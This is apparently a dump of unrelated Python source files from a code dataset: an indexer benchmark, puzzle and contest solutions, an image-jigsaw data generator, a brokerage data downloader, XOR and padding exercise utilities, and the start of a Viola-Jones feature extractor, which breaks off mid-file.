# /v2/assets/{asset-id}/balances -- maybe add index to account_asset table?
#
# To make fast:
# CREATE INDEX CONCURRENTLY IF NOT EXISTS account_asset_asset ON account_asset (assetid, addr ASC);
def assetBalances(rooturl, assets, n=1000, minTime=None, maxTime=10, ntxns=1000):
    """Fetch up to *ntxns* holder balances per asset, assets in random order.

    Stop rules mirror accountRandom.  Returns a stats dict with asset and
    balance-record counts.
    NOTE(review): with an empty *assets* dict, ``dt`` is unbound and the
    log line divides by zero.
    """
    rootparts = urllib.parse.urlparse(rooturl)
    rawurl = list(rootparts)
    atxnsurl = list(rootparts)
    assets = list(assets.keys())
    random.shuffle(assets)
    count = 0
    balcount = 0
    start = time.time()
    reporturl = None
    for assetid in assets:
        atxnsurl[2] = os.path.join(rawurl[2], 'v2', 'assets', str(assetid), 'balances')
        query = {'limit':ntxns}
        atxnsurl[4] = urllib.parse.urlencode(query)
        pageurl = urllib.parse.urlunparse(atxnsurl)
        if reporturl is None:
            reporturl = pageurl
        logger.debug('GET %s', pageurl)
        response = urllib.request.urlopen(pageurl)
        if (response.code != 200) or not response.getheader('Content-Type').startswith('application/json'):
            raise Exception("bad response to {!r}: {}".format(pageurl, response.reason))
        ob = json.loads(response.read())
        bals = ob.get('balances', [])
        balcount += len(bals)
        count += 1
        dt = time.time() - start
        # stop rules: see accountRandom
        if (n and (count >= n)) and (not minTime or (dt > minTime)):
            break
        if not n and minTime and (dt > minTime):
            break
        if maxTime and (dt > maxTime):
            break
    logger.info('asset balances: %d assets in %0.2f seconds, %.1f /s; %d bals, %.1f bal/s', count, dt, count/dt, balcount, balcount/dt)
    return {'url':reporturl, 'assets': count, 'seconds': dt, 'balances': balcount}
# TODO:
# /v2/applications -- this should be fast because it's a single table scan
# /v2/applications/N -- single row lookup, easy
# /v2/assets/{asset-id} -- single row lookup, easy
# /v2/blocks/{round-number} -- single row lookup, easy
# /v2/transactions what search opts?
def main():
    """Command-line entry point: benchmark an indexer's account and asset
    endpoints and dump a JSON stats report to stdout."""
    import argparse
    ap = argparse.ArgumentParser()
    ap.add_argument('--indexer', default='http://localhost:8980', help='URL to indexer to fetch from, default http://localhost:8980')
    # Bug fix: the original used ``type=bool`` for --accounts/--assets, but
    # bool('false') is True, so any explicitly supplied value enabled the
    # flag.  store_true/store_false actions give the intended on/off
    # semantics; both suites remain enabled by default.
    ap.add_argument('--accounts', dest='accounts', action='store_true', default=True)
    ap.add_argument('--no-accounts', dest='accounts', action='store_false')
    ap.add_argument('--assets', dest='assets', action='store_true', default=True)
    ap.add_argument('--no-assets', dest='assets', action='store_false')
    ap.add_argument('--verbose', default=False, action='store_true')
    args = ap.parse_args()
    if args.verbose:
        logging.basicConfig(level=logging.DEBUG)
    else:
        logging.basicConfig(level=logging.INFO)
    indexerurl = args.indexer
    if not indexerurl.startswith('http://'):
        indexerurl = 'http://' + indexerurl
    report = []
    if args.accounts:
        # account list, then random single-account gets, then recent txns
        accounts, rept = getAccountList(indexerurl)
        report.append(rept)
        rept = accountRandom(indexerurl, accounts, n=1000, minTime=1, maxTime=30)
        report.append(rept)
        rept = accountRecents(indexerurl, accounts, n=1000, minTime=1, maxTime=30)
        report.append(rept)
    if args.assets:
        # asset list, then per-asset transactions and balances
        assets, rept = getAssets(indexerurl)
        report.append(rept)
        rept = assetTxns(indexerurl, assets)
        report.append(rept)
        rept = assetBalances(indexerurl, assets)
        report.append(rept)
    json.dump(report, sys.stdout)
    sys.stdout.write('\n')
    return 0


if __name__ == '__main__':
    sys.exit(main())
| StarcoderdataPython |
4829263 | #!/usr/bin/env python
import re
import itertools
# Advent of Code 2015 day 13 (part 2): maximize total happiness of a circular
# seating arrangement, including "myself" with zero-valued relationships.
# NOTE: Python 2 script (print statement at the bottom).
people = set()
relationships = dict()  # person -> neighbour -> happiness delta
total = 0
with open('../inputs/13.txt') as f:
    for line in f:
        m = re.match(r'(\w+) would (gain|lose) (\d+) happiness units by sitting next to (\w+).', line)
        (p1, operand, value, p2) = m.groups()
        value = int(value)
        if operand == 'lose':
            value = -value;
        people.add(p1)
        people.add(p2)
        if p1 not in relationships:
            relationships[p1] = dict()
        if p2 not in relationships:
            relationships[p2] = dict()
        relationships[p1][p2] = value
# Add myself.
relationships['myself'] = dict()
for p in people:
    relationships['myself'][p] = 0
    relationships[p]['myself'] = 0
people.add('myself')
# Brute-force every circular order; i = -1 pairs the last guest with the
# first, and each adjacency is scored in both directions.
for arrangement in itertools.permutations(people):
    components = []  # NOTE(review): unused
    happiness = 0
    for i in range(-1, len(arrangement) - 1):
        p1 = arrangement[i]
        p2 = arrangement[i + 1]
        happiness += relationships[p1][p2]
        happiness += relationships[p2][p1]
    # NOTE(review): total == 0 doubles as "unset"; this picks the wrong
    # answer if the optimum happiness is <= 0.
    if total == 0 or total < happiness:
        total = happiness
print total
| StarcoderdataPython |
1799489 | import h5py
import random
import numpy as np
class DataGenerator:
    """
    Class for a generator that reads in data from the HDF5 file, one batch at
    a time, converts it into the jigsaw, and then returns the data
    """
    def __init__(self, conf, maxHammingSet):
        """Cache configuration, dataset statistics and batch bookkeeping.

        conf: configuration object providing data_path, numChannels,
            numCrops, cropSize, cellSize, tileSize, colorJitter, batchSize.
        maxHammingSet: sequence of crop permutations, one row per jigsaw
            class; its row count defines numClasses.
        """
        self.data_path = conf.data_path
        self.numChannels = conf.numChannels
        self.numCrops = conf.numCrops
        self.cropSize = conf.cropSize
        self.cellSize = conf.cellSize
        self.tileSize = conf.tileSize
        self.colorJitter = conf.colorJitter
        self.batchSize = conf.batchSize
        self.meanTensor, self.stdTensor = self.get_stats()
        self.maxHammingSet = np.array(maxHammingSet, dtype=np.uint8)
        self.batch_counter()
        self.numClasses = self.maxHammingSet.shape[0]  # i.e. number of jigsaw types
    def get_stats(self):
        """Load per-pixel train mean/std from the HDF5 file as float32,
        adding a trailing channel axis for single-channel data."""
        h5f = h5py.File(self.data_path, 'r')
        mean = h5f['train_mean'][:].astype(np.float32)
        std = h5f['train_std'][:].astype(np.float32)
        h5f.close()
        if self.numChannels == 1:
            mean = np.expand_dims(mean, axis=-1)
            std = np.expand_dims(std, axis=-1)
        return mean, std
    def batch_counter(self):
        """Count whole batches in each split and reset the per-split cursors."""
        h5f = h5py.File(self.data_path, 'r')
        self.numTrainBatch = h5f['train_img'][:].shape[0] // self.batchSize
        self.numValBatch = h5f['val_img'][:].shape[0] // self.batchSize
        self.numTestBatch = h5f['test_img'][:].shape[0] // self.batchSize
        h5f.close()
        self.batchIndexTrain = 0
        self.batchIndexVal = 0
        self.batchIndexTest = 0
    def __batch_generation_normalized(self, x):
        """Normalize a batch (in place) and split each image into its crops.

        Returns (X, y): X is a list of numCrops 4-D float32 arrays, one per
        crop position; y holds the permutation index picked per image.
        """
        x -= self.meanTensor
        x /= self.stdTensor
        # This implementation modifies each image individually
        y = np.empty(self.batchSize)
        # Python list of 4D numpy tensors for each channel
        X = [np.empty((self.batchSize, self.tileSize, self.tileSize, self.numChannels), np.float32)
             for _ in range(self.numCrops)]
        for image_num in range(self.batchSize):
            # Transform the image into its nine crops
            single_image, y[image_num] = self.create_croppings(x[image_num])
            for image_location in range(self.numCrops):
                X[image_location][image_num, :, :, :] = single_image[:, :, :, image_location]
        return X, y
    def one_hot(self, y):
        """One-hot encode a vector of class indices into (len(y), numClasses)."""
        return np.array([[1 if y[i] == j else 0 for j in range(self.numClasses)] for i in range(y.shape[0])])
    def generate(self, mode='train'):
        """Return the next batch for *mode* ('train', 'valid' or 'test').

        Returns (inputs, labels): inputs shaped (batch, tile, tile,
        channels, crop), labels one-hot over jigsaw classes.  The per-split
        cursor advances and wraps at the end of the split.
        NOTE(review): any other mode leaves X/y unbound and raises
        NameError at the return -- confirm callers pass only these three.
        """
        if mode == 'train':
            h5f = h5py.File(self.data_path, 'r')
            x = h5f['train_img'][self.batchIndexTrain * self.batchSize:(self.batchIndexTrain + 1) * self.batchSize, ...]
            h5f.close()
            if self.numChannels == 1:
                x = np.expand_dims(x, axis=-1)
            X, y = self.__batch_generation_normalized(x.astype(np.float32))
            self.batchIndexTrain += 1  # Increment the batch index
            if self.batchIndexTrain == self.numTrainBatch:
                self.batchIndexTrain = 0
        elif mode == 'valid':
            h5f = h5py.File(self.data_path, 'r')
            x = h5f['val_img'][self.batchIndexVal * self.batchSize:(self.batchIndexVal + 1) * self.batchSize, ...]
            h5f.close()
            if self.numChannels == 1:
                x = np.expand_dims(x, axis=-1)
            X, y = self.__batch_generation_normalized(x.astype(np.float32))
            self.batchIndexVal += 1  # Increment the batch index
            if self.batchIndexVal == self.numValBatch:
                self.batchIndexVal = 0
        elif mode == 'test':
            h5f = h5py.File(self.data_path, 'r')
            x = h5f['test_img'][self.batchIndexTest * self.batchSize:(self.batchIndexTest + 1) * self.batchSize, ...]
            h5f.close()
            if self.numChannels == 1:
                x = np.expand_dims(x, axis=-1)
            X, y = self.__batch_generation_normalized(x.astype(np.float32))
            self.batchIndexTest += 1  # Increment the batch index
            if self.batchIndexTest == self.numTestBatch:
                self.batchIndexTest = 0
        return np.transpose(np.array(X), axes=[1, 2, 3, 4, 0]), self.one_hot(y)
    def randomize(self):
        """ Randomizes the order of data samples"""
        # Rewrites the 'train_img' dataset inside the HDF5 file in a random
        # permutation (note: materializes the whole split in memory).
        h5f = h5py.File(self.data_path, 'a')
        train_img = h5f['train_img'][:].astype(np.float32)
        permutation = np.random.permutation(train_img.shape[0])
        train_img = train_img[permutation, :, :, :]
        del h5f['train_img']
        h5f.create_dataset('train_img', data=train_img)
        h5f.close()
    def create_croppings(self, image):
        """
        Take in a 3D numpy array (256x256x3) and a 4D numpy array containing 9 "jigsaw" puzzles.
        Dimensions of the output array is 64 (height) x 64 (width) x 3 (colour channels) x 9(each cropping)
        The 3x3 grid is numbered as follows:
        0 1 2
        3 4 5
        6 7 8
        NOTE(review): random.randrange(cellSize - tileSize) requires
        cellSize > tileSize, and the crop jitter requires the image to be
        strictly larger than cropSize unless widths are equal -- confirm
        the configuration guarantees both.
        """
        # Jitter the colour channel
        # image = self.color_channel_jitter(image)
        y_dim, x_dim = image.shape[:2]
        # Have the x & y coordinate of the crop
        if x_dim != self.cropSize:
            crop_x = random.randrange(x_dim - self.cropSize)
            crop_y = random.randrange(y_dim - self.cropSize)
        else:
            crop_x, crop_y = 0, 0
        # Select which image ordering we'll use from the maximum hamming set
        perm_index = random.randrange(self.numClasses)
        final_crops = np.zeros((self.tileSize, self.tileSize, self.numChannels, self.numCrops), dtype=np.float32)
        n_crops = int(np.sqrt(self.numCrops))
        for row in range(n_crops):
            for col in range(n_crops):
                x_start = crop_x + col * self.cellSize + random.randrange(self.cellSize - self.tileSize)
                y_start = crop_y + row * self.cellSize + random.randrange(self.cellSize - self.tileSize)
                # Put the crop in the list of pieces randomly according to the number picked
                final_crops[:, :, :, self.maxHammingSet[perm_index, row * n_crops + col]] = \
                    image[y_start:y_start + self.tileSize, x_start:x_start + self.tileSize, :]
        return final_crops, perm_index
    def color_channel_jitter(self, image):
        """Crop colorJitter pixels off each border and shift the window by a
        random offset.

        NOTE(review): a single (R_xjit, R_yjit) offset is applied to all
        three channels, so channels are not jittered independently despite
        the name -- confirm intent.
        """
        # Determine the dimensions of the array, minus the crop around the border
        # of 4 pixels (threshold margin due to 2 pixel jitter)
        x_dim = image.shape[0] - self.colorJitter * 2
        y_dim = image.shape[1] - self.colorJitter * 2
        # Determine the jitters in all directions
        R_xjit = random.randrange(self.colorJitter * 2 + 1)
        R_yjit = random.randrange(self.colorJitter * 2 + 1)
        # Seperate the colour channels
        return_array = np.empty((x_dim, y_dim, 3), np.float32)
        for colour_channel in range(3):
            return_array[:, :, colour_channel] = \
                image[R_xjit:x_dim + R_xjit, R_yjit:y_dim + R_yjit, colour_channel]
        return return_array
| StarcoderdataPython |
32397 | import datetime
import pytz
from tws_async import *
# Instruments to request history for.  Stock, Forex, HistRequest, util and
# HistRequester all come from the ``from tws_async import *`` import above.
stocks = [
    Stock('TSLA'),
    Stock('AAPL'),
    Stock('GOOG'),
    Stock('INTC', primaryExchange='NASDAQ')
]
forexs = [
    Forex('EURUSD'),
    Forex('GBPUSD'),
    Forex('USDJPY')
]
# Request the last week of data: one HistRequest per stock per day, plus
# daily-bar midpoint requests for each forex pair.
endDate = datetime.date.today()
startDate = endDate - datetime.timedelta(days=7)
histReqs = []
for date in util.dateRange(startDate, endDate):
    histReqs += [HistRequest(stock, date) for stock in stocks]
    histReqs += [HistRequest(forex, date, whatToShow='MIDPOINT',
                             durationStr='30 D', barSizeSetting='1 day') for forex in forexs]
timezone = datetime.timezone.utc
# timezone = pytz.timezone('Europe/Amsterdam')
# timezone = pytz.timezone('US/Eastern')
util.logToConsole()
# Connect to a local TWS/IB Gateway and download everything under ./data.
tws = HistRequester()
tws.connect('127.0.0.1', 7497, clientId=1)
task = tws.download(histReqs, rootDir='data', timezone=timezone)
tws.run(task)
| StarcoderdataPython |
86718 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 13 16:00:40 2018
@author: co-well-752410
"""
import sys
import cv2
import numpy as np
import tensorflow as tf
import tensorflow.python.platform
import os
import configparser
# 外部のコンフィグを読み込む
# Read the extraction output directory from an external config file.
inifile = configparser.ConfigParser()
inifile.read('config1.ini')
# 入力画像ディレクトリのパス。最後はスラッシュで終わる必要あり。
# (Input image directory path; must end with a slash.)
in_dir = inifile.get('extraction', 'out')
names = os.listdir(in_dir)
i = 0  # per-image index written to train.txt
y = 0  # per-class index written to trainlabel.txt
for name in names:
    if not "." in name:  # treat dot-less entries as class directories
        # one "<class> <class-index>" line per directory
        f1 = open('trainlabel.txt', 'a')
        f1.write(name + ' ' + str(y) + '\n')
        f1.close()
        in_dir_characters = os.listdir(in_dir + '/' + name + '/')
        for in_dir_character in in_dir_characters:
            if not "DS_Store" in in_dir_character:
                # one "<class>/<file> <image-index>" line per image
                f = open('train.txt', 'a')
                f.write(name + '/' + in_dir_character + ' ' + str(i) + '\n')
                f.close()
                i += 1
        y += 1
        # NOTE(review): the original file's indentation was lost in this
        # dump; this placement resets the image counter after each class
        # directory -- confirm against the original source.
        i = 0
1775454 | <reponame>akashsuper2000/codechef-archive
def sod(n):
    """Return the sum of the decimal digits of non-negative integer n."""
    total = 0
    while n:
        total += n % 10
        n //= 10
    return total
from math import gcd

# Bug fix: the original bound the modulus to ``k`` and then reused ``k`` as
# the inner loop index, so ``print(c % k)`` reduced the count modulo the last
# index value instead of 10**9 + 7.  The modulus now has its own name.
MOD = 10**9 + 7
for _ in range(int(input())):
    l, r = [int(tok) for tok in input().split()]
    # digit sums of every value in [l, r]
    digit_sums = [sod(v) for v in range(l, r + 1)]
    n = r - l + 1
    c = 0
    # count unordered pairs whose digit sums are coprime
    for i in range(n):
        for j in range(i + 1, n):
            if gcd(digit_sums[i], digit_sums[j]) == 1:
                c = c + 1
    print(c % MOD)
| StarcoderdataPython |
4835078 | <reponame>uberj/newfriends<gh_stars>0
import string
import math
import random
from pprint import pprint
# Everything that uses BitArray needs to be removed. I used this early on before I knew about how nice bytes are
from bitstring import BitArray as BA
SAMPLE_TEXT = """
Yo, VIP, let's kick it!
Ice Ice Baby, Ice Ice Baby
All right stop, Collaborate and listen
Ice is back with my brand new invention
Something grabs a hold of me tightly
Flow like a harpoon daily and nightly
Will it ever stop? Yo, I don't know
Turn off the lights and I'll glow
To the extreme I rock a mic like a vandal
Light up a stage and wax a chump like a candle.
Dance, go rush the speaker that booms
I'm killing your brain like a poisonous mushroom
Deadly, when I play a dope melody
Anything less than the best is a felony
Love it or leave it, you better gain way
You better hit bull's eye, the kid don't play
If there was a problem, yo, I'll solve it
Check out the hook while my DJ revolves it
Ice Ice Baby Vanilla, Ice Ice Baby Vanilla
Ice Ice Baby Vanilla, Ice Ice Baby Vanilla
Now that the party is jumping
With the bass kicked in, and the Vegas are pumpin'
Quick to the point, to the point, no faking
Cooking MCs like a pound of bacon
Burning them they ain't quick and nimble
I go crazy when I hear a cymbal
And a hi hat with a souped up tempo
I'm on a roll and it's time to go solo
Rollin' in my 5.0
With my ragtop down so my hair can blow
The girlies on standby, waving just to say, "Hi!"
Did you stop? No, I just drove by
Kept on pursuing to the next stop
I busted a left and I'm heading to the next block
That block was dead Yo
So I continued to A1A Beachfront Ave.
Girls were hot wearing less than bikinis
Rockman lovers driving Lamborghinis
Jealous 'cause I'm out getting mine
Shay with a gauge and Vanilla with a nine
Ready for the chumps on the wall
The chumps acting ill because they're so full of "Eight Ball"
Gunshots ranged out like a bell
I grabbed my nine, all I heard was shells
Falling on the concrete real fast
Jumped in my car, slammed on the gas
Bumper to bumper, the avenue's packed
I'm trying to get away before the jackers jack
Police on the scene, you know what I mean
They passed me up, confronted all the dope fiends
If there was a problem, yo, I'll solve it
Check out the hook while my DJ revolves it
Ice Ice Baby Vanilla, Ice Ice Baby Vanilla
Ice Ice Baby Vanilla, Ice Ice Baby Vanilla
Take heed, 'cause I'm a lyrical poet
Miami's on the scene just in case you didn't know it
My town, that created all the bass sound
Enough to shake and kick holes in the ground
'Cause my style's like a chemical spill
Feasible rhymes that you can vision and feel
Conducted and formed, this is a hell of a concept
We make it hype and you want to step with this
Shay plays on the fade, slice like a ninja
Cut like a razor blade so fast, other DJs say, "Damn."
If my rhyme was a drug, I'd sell it by the gram
Keep my composure when it's time to get loose
Magnetized by the mic while I kick my juice
If there was a problem, Yo, I'll solve it!
Check out the hook while D-Shay revolves it.
Ice Ice Baby Vanilla, Ice Ice Baby Vanilla
Ice Ice Baby Vanilla, Ice Ice Baby Vanilla
Yo, man, let's get out of here! Word to your mother!
Ice Ice Baby Too cold, Ice Ice Baby Too cold Too cold
Ice Ice Baby Too cold Too cold, Ice Ice Baby Too cold Too cold
"""
LETTER_FREQ = {'\n': 2.8952504879635654, 'y': 2.6675341574495772, 'o': 5.823031880286272, ',': 1.398828887443071,
' ': 17.56668835393624, 'v': 1.1711125569290826, 'i': 6.701366297983085, 'p': 1.5289525048796355,
'l': 4.912166558230319, 'e': 8.295380611581002, 't': 5.790500975927131, "'": 0.9433962264150944,
's': 3.610930383864672, 'k': 1.5289525048796355, 'c': 3.4482758620689653, '!': 0.16265452179570591,
'b': 2.47234873129473, 'a': 6.701366297983085, 'r': 2.504879635653871, 'g': 1.594014313597918,
'h': 3.610930383864672, 'n': 4.4567338972023425, 'd': 2.5699414443721533, 'w': 1.3662979830839297,
'm': 2.147039687703318, 'f': 0.9108653220559532, '?': 0.06506180871828238, 'u': 1.951854261548471,
'x': 0.13012361743656475, '.': 0.16265452179570591, 'j': 0.4229017566688354, 'q': 0.06506180871828238,
'z': 0.09759271307742355, '5': 0.03253090435914119, '0': 0.03253090435914119, '"': 0.1951854261548471,
'1': 0.03253090435914119, '-': 0.03253090435914119}
def ints_to_hex(ints: [int]) -> str:
    """Render each integer as four zero-padded hex digits and concatenate."""
    return "".join(hex(n)[2:].rjust(4, "0") for n in ints)
def hex_to_ints(hex_s: str) -> [int]:
    """Parse a hex string into a list of integers, two hex digits at a time.

    NOTE(review): this does not invert ints_to_hex (which emits 4 hex digits
    per int).  The ``i % 3 == 0`` flush with ``i`` stepping by 2 groups the
    bytes unevenly, and ``empty_cur`` stays True after a flush even though
    the same iteration then adds data to ``cur``, so the final group can be
    silently dropped.  Confirm the intended grouping before relying on this.
    """
    if len(hex_s) % 2 == 1:
        hex_s = "0" + hex_s  # left-pad to an even number of hex digits
    cur = 0
    empty_cur = True
    ns = []
    for i in range(0, len(hex_s) - 1, 2):
        b0 = int(hex_s[i], 16)
        b1 = int(hex_s[i + 1], 16)
        empty_cur = False
        if i != 0 and i % 3 == 0:
            # flush the accumulated value and start a new group
            ns.append(cur)
            cur = 0
            empty_cur = True
        cur = (cur << 8) + (b0 << 4) + b1
    if not empty_cur:
        ns.append(cur)
    return ns
def zip_bytes(buff0, buff1, default=0) -> [(int, int)]:
    """Yield pairs from two byte buffers, padding the shorter one with
    *default* so the longer buffer is fully consumed."""
    longest = max(len(buff0), len(buff1))
    for i in range(longest):
        a = buff0[i] if i < len(buff0) else default
        b = buff1[i] if i < len(buff1) else default
        yield (a, b)
def xor(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings element-wise; zip semantics truncate the result
    to the shorter input."""
    return bytes(x ^ y for x, y in zip(a, b))
def word_dictionary():
    """Load the system word list into a set, one stripped word per line."""
    with open("/usr/share/dict/words", "r") as fd:
        return {line.strip() for line in fd}
WORD_DICTIONARY = word_dictionary()
def dictionary_word_count(candidate: BA):
    """Return the fraction of space-separated words in *candidate* that
    appear in the system word dictionary."""
    words = to_str(candidate).split(" ")
    hits = sum(1 for w in words if w in WORD_DICTIONARY)
    return float(hits) / len(words)
def to_str(candidate: BA) -> str:
return "".join([chr(b) for b in candidate.bytes])
def str_to_ba(i: str) -> BA:
    """Encode *i* as UTF-8 and wrap the resulting bytes in a BitArray."""
    encoded = i.encode()
    return BA(encoded)
VALID_LETTERS = set(string.ascii_letters)
def valid_letter_count_percentage(candidate: BA) -> float:
    """Return the fraction of bytes in *candidate* that are ASCII letters."""
    letter_count = sum(1 for b in candidate.bytes if chr(b) in VALID_LETTERS)
    return float(letter_count) / len(candidate.bytes)
def pad16_PKCS7(s: bytes) -> bytes:
    """Apply PKCS#7 padding for a 16-byte block size.

    Appends 1..16 bytes, each equal to the number of bytes appended; an
    already-aligned input gains a full 16-byte padding block.
    """
    pad_len = 16 - (len(s) % 16)
    return s + bytes([pad_len]) * pad_len
class PaddingException(Exception):
    """Raised when PKCS#7 padding validation fails."""
    pass
def unpad16_PKCS7(padded: bytes) -> bytes:
    """Strip PKCS#7 padding (16-byte block size) from *padded*.

    Raises PaddingException when the trailing bytes do not form valid
    padding (count of 0, count > 16, empty input, or mismatched pad bytes).

    Bug fixed: the original ended with ``padded.rstrip(expected_pad)``.
    ``rstrip`` strips by character *set*, so any plaintext bytes equal to
    the pad byte were stripped too (e.g. b'ab\\x02' + b'\\x02\\x02' lost its
    final plaintext byte).  Slicing off exactly the declared pad length is
    the correct inverse of pad16_PKCS7.
    """
    if not padded:
        raise PaddingException("Bad padding")
    expected_pad_count = padded[-1]
    # a pad count of 0 is never produced by PKCS#7 and would previously
    # have been accepted silently
    if expected_pad_count > 16 or expected_pad_count == 0:
        raise PaddingException("Bad padding")
    expected_pad = bytes([expected_pad_count]) * expected_pad_count
    if not padded.endswith(expected_pad):
        raise PaddingException("Bad padding")
    return padded[:-expected_pad_count]
def pad8(candidate: BA) -> BA:
    """Pad *candidate* with zero nibbles so its bit length is a multiple of 8.

    Bug fixed: ``hangover / 4`` is float division on Python 3 and repeating
    a BitArray by a float fails; floor division restores the intended
    integer nibble count.
    NOTE(review): when the bit length is not a multiple of 4, nibble-wise
    padding still cannot reach a byte boundary -- callers appear to pass
    nibble-aligned data only; confirm.
    """
    hangover = 8 - (len(candidate) % 8)
    if hangover != 8:
        candidate += BA("0x0") * (hangover // 4)
    return candidate
def realistic_letter_distribution(candidate: BA) -> float:
    """Score how English-like *candidate* is: pad to a byte boundary,
    decode to text, lowercase, and delegate to the string scorer."""
    # pad candidate to get to a byte valid string so we can convert it
    padded = pad8(candidate)
    lowered = to_str(padded).lower()
    return realistic_letter_distribution_(lowered)
def realistic_letter_distribution_(s: str) -> float:
    """Score how closely the character frequencies of *s* match the
    reference English distribution in LETTER_FREQ.

    Each distinct character contributes a penalty: the absolute error
    against its reference frequency, or a flat 300 when the character has
    no reference entry.  The (negative) total is averaged over the number
    of distinct characters; higher is better.
    """
    score = 0
    uniq_chars = set(s)
    for ch in uniq_chars:
        occurrences = sum(1 for x in s if x == ch)
        freq_pct = (occurrences / len(s)) * 100
        if ch in LETTER_FREQ:
            score -= math.fabs(LETTER_FREQ.get(ch) - freq_pct * 10)
        else:
            score -= 300
    return score / len(uniq_chars)
def hamming_weight(a, b):
    """Hamming distance between two equal-length BitArrays: the number of
    differing bits (count(True) counts set bits in the XOR)."""
    return (a ^ b).count(True)
def xor_cycle_encrypt(key: BA, m: BA) -> BA:
    """Repeating-key XOR: tile *key* to the length of *m* and XOR them.

    The operation is its own inverse, so this both encrypts and decrypts.
    """
    e = key * math.ceil(float(len(m)) / len(key))
    e = e[:len(m)]  # trim the final partial repetition
    assert len(e) == len(m)
    return e ^ m
def find_best_key(e: BA) -> chr:
    """Return the single-byte XOR key whose decryption of *e* scores closest
    to English letter frequencies.

    NOTE(review): the key is tiled via ``BA(hex(i)) * ks`` -- for byte
    values below 16, ``hex(i)`` encodes a single nibble, so the tiled key
    can come out shorter than *e* (partially patched by the ``key * 2``
    doubling); the assert guards the cases that still mismatch.  Compare
    attempt_all_keys, which has the same fragility.
    """
    scores = []
    for c in map(chr, range(256)):
        i = ord(c)
        ks = int((len(e) / 8))
        key = BA(hex(i)) * ks
        if len(key) < len(e):
            key = key * 2
        assert len(key) == len(e), "len(key)=%s len(e)=%s" % (len(key), len(e))
        candidate = (e ^ key)
        scores.append((realistic_letter_distribution(candidate), c))
    best = sorted(scores, key=lambda x: x[0])
    # ascending sort: the best (highest) score is last
    return best[-1][1]
def top_n_decrypt_key(n: int, e: BA) -> [(int, chr, str)]:
    """Return the *n* highest-scoring single-byte-key decryptions of *e*."""
    ranked = list(reversed(sorted(attempt_all_keys(e), key=lambda x: x[0])))
    return ranked[:n]
def best_decrypt_key(e: BA) -> (int, chr, str):
    """Return the single highest-scoring decryption candidate for *e*."""
    ranked = list(reversed(sorted(attempt_all_keys(e), key=lambda x: x[0])))
    return ranked[0]
def attempt_all_keys(e: BA) -> [(int, chr, str, BA)]:
    """Try every non-zero single-byte XOR key against the (byte-padded) *e*.

    Returns one tuple per key.  NOTE(review): the annotation above says
    4-tuples but the code appends 5 elements (score, key char, decoded
    text, decoded BitArray, padded input); callers appear to use the first
    three.  Also: ``hex(i)`` keeps its ``0x`` prefix, so the repeated
    string looks like ``'0x50x5...'`` -- confirm BitArray accepts that
    form before trusting the key construction.
    """
    scores = []
    e = pad8(e)
    for i in range(1, 256):
        # tile the key so its bit length matches e: one nibble per repeat
        # for values < 16, one byte per repeat otherwise
        if i < 16:
            key = BA(hex(i) * int(len(e) / float(4)))
        else:
            key = BA(hex(i) * int(len(e) / float(8)))
        candidate = (e ^ key)
        scores.append((realistic_letter_distribution(candidate), chr(i), to_str(candidate), candidate, e))
    return scores
def top_n_key_sizes(n: int, e: BA) -> [(int, int)]:
    """Guess likely repeating-XOR key sizes for ciphertext *e*.

    For each candidate size (1..49, bounded by the data length), cuts *e*
    into key-size-byte chunks and averages the Hamming distance between
    adjacent chunks, normalized by the key size.  Returns the *n*
    (key_size, distance) pairs with the smallest normalized distance.
    """
    distances = []
    for guess_key_size in range(1, min(50, len(e.bytes))):
        bs = list(e.cut(guess_key_size * 8))
        if not bs or len(bs) == 1:
            continue  # need at least two chunks to compare
        ds = []
        for i in range(len(bs) - 1):
            b0 = bs[i]
            b1 = bs[i + 1]
            ds.append(hamming_weight(b0, b1) / float(guess_key_size))
        distance = sum(ds) / float(len(ds))
        distances.append((guess_key_size, distance))
    return list(sorted(distances, key=lambda x: x[1]))[:n]
def bytes_to_ba(bs: [int]) -> BA:
    """Build a BitArray from a sequence of byte values (0-255).

    Bug fixed: the original concatenated ``"0x0" + hex(b)`` for b < 15,
    producing fragments like ``"0x00x5"`` (invalid hex once the first
    prefix was stripped), and its ``b < 15`` boundary rendered 15 itself as
    the single digit ``f``, misaligning every following byte.  Formatting
    each byte as exactly two hex digits fixes both.
    """
    hex_digits = "".join("{:02x}".format(b) for b in bs)
    return BA("0x" + hex_digits)
def transpose(e: BA, ks: int) -> [BA]:
    """Split e's bytes into *ks* interleaved blocks for repeating-key XOR
    analysis: block i holds bytes i, i+ks, i+2*ks, ... (every byte that the
    same key byte would have encrypted)."""
    blocks = []
    for i in range(ks):
        ith_blocks = []
        for j in range(i, len(e.bytes), ks):
            b = e.bytes[j]
            ith_blocks.append(b)
        ba = bytes_to_ba(ith_blocks)
        blocks.append(ba)
    return blocks
def rand_n_string(n):
    """Return a string of *n* characters drawn uniformly (with replacement)
    from string.printable."""
    chars = [random.choice(string.printable) for _ in range(n)]
    return "".join(chars)
| StarcoderdataPython |
71853 | <reponame>jinchengli97/Viola-Jones-Facial-Recognition<gh_stars>0
from myfoobar import int_img, Harr1, Harr2, Harr3, Harr4
import matplotlib.image as mpimg
import numpy as np
import os
import time
# Positive (face) and negative (non-face) training image directories.
img_dir_faces = 'C:/Users/lijin/Desktop/Fall 2020/ECEN649/Project/trainset/faces/'
img_dir_non_faces = 'C:/Users/lijin/Desktop/Fall 2020/ECEN649/Project/trainset/non-faces/'
# Precomputed feature-location arrays, one per Haar feature type (format
# defined by whichever script produced the .npy files).
Harr1Map = np.load('Harr1Map.npy')
Harr2Map = np.load('Harr2Map.npy')
Harr3Map = np.load('Harr3Map.npy')
Harr4Map = np.load('Harr4Map.npy')
HarrMap = np.load('HarrMap.npy')  # NOTE(review): loaded but unused below
# ------------------------------------------
tic = time.time()
# ------------------------------------------
# training faces: one feature vector per image, with label 1 appended last
data_path = os.listdir(img_dir_faces)
trainingset = []
for f1 in data_path:
    HF = []  # Haar feature values for this image
    img_path = img_dir_faces + f1
    img = mpimg.imread(img_path)
    imglength = len(img)
    # int_img presumably builds the integral image in place on the copy
    # (its return value is ignored) -- confirm against myfoobar.int_img
    integral_image = img.copy()
    int_img(integral_image, imglength)
    for location in Harr1Map:
        HF.append(Harr1(integral_image, location))
    for location in Harr2Map:
        HF.append(Harr2(integral_image, location))
    for location in Harr3Map:
        HF.append(Harr3(integral_image, location))
    for location in Harr4Map:
        HF.append(Harr4(integral_image, location))
    label = [1]
    feature = HF + label
    trainingset.append(feature)
# ------------------------------------------
# training non faces: identical feature extraction, label -1
